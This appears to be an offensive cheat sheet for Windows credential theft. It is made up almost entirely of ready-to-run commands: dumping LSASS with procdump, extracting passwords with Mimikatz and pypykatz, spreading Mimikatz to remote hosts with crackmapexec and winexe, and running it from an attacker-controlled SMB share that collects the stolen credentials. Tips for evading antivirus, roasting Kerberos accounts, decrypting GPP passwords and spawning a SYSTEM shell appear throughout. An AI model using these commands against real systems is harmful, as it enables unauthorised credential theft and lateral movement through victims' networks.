LSASS and Mimikatz

LSASS

# Avoiding running Mimikatz on the target can be a nice solution for stealth
# You can just dump the LSASS process, get them and parse it locally
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Several dumping methods here
https://kaluche.github.io/posts/2020/09/dumping-credentials-offline/


Mimikatz

# If you have an LSASS dump, you can use the minidump module
mimikatz # sekurlsa::minidump lsass.DMP
mimikatz # sekurlsa::logonPasswords /full

# You can upload mimikatz to a remote machine with smbclient

# Or you can use crackmapexec
# Executon may fail but the binary will be uploaded in C:\\Windows\\mimikatz.exe
crackmapexec IP -u user -p password -M mimikatz

# Then you can execute remotely through winexe
winexe -U admin%password //IP C:\\Windows\\mimikatz.exe

# Password dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords /full
# In case of Mimikatz is trigerred on the target machine, you can try bring it up using network share
sudo python smbserver.py SHARE /home/xxxxx/share_path/

sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords /full" exit > \\share_ip\SHARE\mimiout_$env:computername.txt'

# In order to be stealthier, you can even do the same for procdump
sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\procdump.exe "TODO"'


Pypykatz

https://github.com/skelsec/pypykatz

# Mimikatz implementation in pure Python. At least a part of it :)
# In case of mimikatz is trigerred by the target AV
# Cross platform (only need python3.6)

# Live commands need to be ran on live systems
# Others commands can be used for other purposes
# Get LSASS credentials (+ Kerberos tickets)
pypykatz live lsa
pypykatz live lsa -o <output_dir> -k <kerberos_dir>

# List users prone to SPNRoast and ASRepRoast
pypykatz live ldap spn
pypykatz live ldap asrep

# Print all tokens
pypykatz live token list

# Spawn a SYSTEM shell
pypykatz live process create

# Print registry credentials
pypykatz live registry

# List all users ever logged on the target
pypykatz live users list

# Gives back the current user in domain:username:SID format
pypykatz live users whoami
# Parsr mimidump file
pypykatz lsa minidump <input_file>

# List domain users prone to SPNRoast or ASRepRoast
pypykatz ldap TEST/victim/pw:@10.10.10.2 spn
pypykatz ldap TEST/victim/pw:@10.10.10.2 asrep

# Decrypt gpp-pass
pypykatz gppass <base64_enc_password>